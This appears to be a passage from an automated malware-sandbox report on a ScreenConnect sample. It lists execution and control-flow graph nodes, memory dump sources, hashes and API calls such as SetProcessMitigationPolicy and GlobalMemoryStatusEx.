                                                                  • Opcode Fuzzy Hash: 2e63a6547c89b4ee8d4dbcf77a72e51fbe7d5ce98faaf33c1cbed823803c4822
                                                                  • Instruction Fuzzy Hash: 98A00295F1C92656A091BF34C60127F00890F84610A3141B1E20DC55CBCD1CB9429247

                                                                  Execution Graph

                                                                  Execution Coverage:11.3%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:10
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 15619 7ffb4a9f7fc4 15621 7ffb4a9f7fcd 15619->15621 15620 7ffb4a9f8032 15621->15620 15622 7ffb4a9f80a6 SetProcessMitigationPolicy 15621->15622 15623 7ffb4a9f8102 15622->15623 15614 7ffb4ad08864 15615 7ffb4ad0886d 15614->15615 15616 7ffb4ad08a13 GlobalMemoryStatusEx 15615->15616 15617 7ffb4ad0891e 15615->15617 15618 7ffb4ad08a35 15616->15618

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 63 7ffb4ad08864-7ffb4ad0886b 64 7ffb4ad0886d-7ffb4ad08875 63->64 65 7ffb4ad08876-7ffb4ad088da 63->65 64->65 69 7ffb4ad088dc-7ffb4ad08905 65->69 70 7ffb4ad08924-7ffb4ad08937 65->70 71 7ffb4ad0895e 69->71 72 7ffb4ad08907-7ffb4ad0890a 69->72 77 7ffb4ad089a8 70->77 78 7ffb4ad08939-7ffb4ad0893d 70->78 76 7ffb4ad0895f 71->76 74 7ffb4ad0898b-7ffb4ad0898f 72->74 75 7ffb4ad0890c-7ffb4ad0890e 72->75 106 7ffb4ad08990 74->106 81 7ffb4ad08910 75->81 82 7ffb4ad0898a 75->82 83 7ffb4ad089db-7ffb4ad089de 76->83 84 7ffb4ad08960 76->84 85 7ffb4ad08a13-7ffb4ad08a33 GlobalMemoryStatusEx 77->85 86 7ffb4ad089aa-7ffb4ad089bc 77->86 79 7ffb4ad089be-7ffb4ad089bf 78->79 80 7ffb4ad0893f-7ffb4ad08941 78->80 90 7ffb4ad089c0-7ffb4ad089c1 79->90 91 7ffb4ad08a09-7ffb4ad08a10 79->91 88 7ffb4ad089bd 80->88 89 7ffb4ad08943-7ffb4ad08947 80->89 93 7ffb4ad08912-7ffb4ad08914 81->93 94 7ffb4ad08953 81->94 82->74 95 7ffb4ad089e1-7ffb4ad08a07 83->95 84->95 96 7ffb4ad08961 84->96 97 7ffb4ad08a3b-7ffb4ad08a62 85->97 98 7ffb4ad08a35 85->98 86->88 88->79 99 7ffb4ad089c3-7ffb4ad089c8 89->99 100 7ffb4ad08949 89->100 90->99 91->85 93->106 107 7ffb4ad08916 93->107 101 7ffb4ad089cf-7ffb4ad089d3 94->101 102 7ffb4ad08955 94->102 95->91 104 7ffb4ad08962-7ffb4ad08989 96->104 105 7ffb4ad089a3-7ffb4ad089a7 96->105 98->97 109 7ffb4ad089c9-7ffb4ad089ce 99->109 100->74 108 7ffb4ad0894b-7ffb4ad0894d 100->108 110 7ffb4ad089d5-7ffb4ad089da 101->110 111 7ffb4ad08956-7ffb4ad08957 102->111 112 7ffb4ad08997-7ffb4ad08999 102->112 104->82 105->77 113 7ffb4ad08918-7ffb4ad0891a 107->113 114 7ffb4ad08959 107->114 108->109 115 7ffb4ad0894f-7ffb4ad08951 108->115 109->101 110->83 111->114 118 7ffb4ad0899b-7ffb4ad0899e 112->118 119 7ffb4ad0899f 112->119 120 7ffb4ad0891c 113->120 121 7ffb4ad08996 113->121 114->110 116 7ffb4ad0895b-7ffb4ad0895d 114->116 115->94 116->71 118->119 122 7ffb4ad089a1 119->122 123 7ffb4ad089a2 119->123 120->76 124 7ffb4ad0891e-7ffb4ad08923 120->124 121->112 122->123 123->105
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1623722621.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffb4ad00000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 63708b819c166339e8eb879df47f89398b34b54cdf4a768b6b60dac9d942fabf
                                                                  • Instruction ID: 75eaea2a20359833037f74db0a4f6f2cae59f112545752521af4506de4cc57f3
                                                                  • Opcode Fuzzy Hash: 63708b819c166339e8eb879df47f89398b34b54cdf4a768b6b60dac9d942fabf
                                                                  • Instruction Fuzzy Hash: 9E8123B1A0D68D4FE765AF7898056EC7FF4EF12314F2401FAC04CD7593DA58680A8782

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1613646456.00007FFB4A9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A9F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffb4a9f0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: c32004e89aa603d26b75a0f1d5b4747ef23eec700026314182ae396cf490336f
                                                                  • Instruction ID: 2e021cd63f909570a8145dbc6e5b560bc2055584c5c5bbd5407c46215b6cebe4
                                                                  • Opcode Fuzzy Hash: c32004e89aa603d26b75a0f1d5b4747ef23eec700026314182ae396cf490336f
                                                                  • Instruction Fuzzy Hash: A841437190CB484FDB15AFB8CC4A5E97BE0EF56311F1401BFE489C3193DE28A8068792